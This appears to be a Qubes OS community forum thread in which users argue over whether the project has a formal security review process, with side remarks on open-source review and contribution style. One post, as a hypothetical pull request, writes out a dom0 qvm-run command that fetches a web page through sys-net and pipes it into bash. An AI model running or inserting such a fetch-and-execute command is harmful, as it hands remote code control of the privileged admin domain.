So, I was wondering: Does the Qubes team use a formal or informal procedure for security reviews?
To make that more concrete, if theres a documented procedure and documented results, I’d consider it a formal procedure.
The reason I’m asking is that if a formal procedure is used, maybe the procedure and results of individual security reviews could be opened up so people could follow along as a learning experience.
Thanks to @barto for finding the post about doing community security reviews as practice/learning experience that i had in mind when I wrote this. The original post is:
I asked “formal or informal” and you said “NO”, which does not make sense. So… I’m guessing your no is actually reffering to your lack of enthusiasm for the idea of a community review process as talked about in that thread?
The answer is to the question in the thread title, “Does the Qubes team use a formal or informal security review process?”, and it makes sense: “does the Qubes team […]?” NO.
It’s all semantics, because you assume things. If I ask “do you beat your wife&kids in the morning or in the evening?” you’d want to answer NO too.
To be fair, you are the security reviewer when it comes to anything GPL, and it can get quite costly to organise a full review, especially if it involved third parties…
Yeah its a bit like that thing I forgot what its called, when something is being robbed and everyone is just standing and watching because they all think someone else will surely call the police. It seems a popular mindset in open source too, “it’s popular so there are surely lots of people verifying all the source code”. We must also remember that this is extremely advanced skills we are talking about.
Well the comments on github imply to me that they do review stuff.
You are saying that you believe that if you submit a qubes github pull request for something that includes something like a dom0: qvm-run --pass-io sys-net “wget http://mywebsite.com; cat index.html” | bash
that it will get accepted without review?
For those who have never written any computer code before, none of this is beyond your comprehension.
If you’ve ever managed people at work before, you know how frustrating it is when everyone is making their work conform to a particular style, and it all fits in nicely together, and then you have this one employee who has spent all this time making something that doesn’t fit into the big picture…
Sure, maybe the employee was able to get the desired result, but the methodology and internal workings to get to that desired result had no similarity to what already exists anything else in the project. More importantly, maybe what that employee has done requires a lot of ongoing maintenance to keep working.
It’s less work for everyone if people who want to contribute make code that “fits” in with the bigger picture, because then they don’t have to waste time undoing everything they’ve done.
You can’t really write code “in a bubble” (well, you can, but it usually takes a lot more time and effort than just referencing something you or someone else has already written).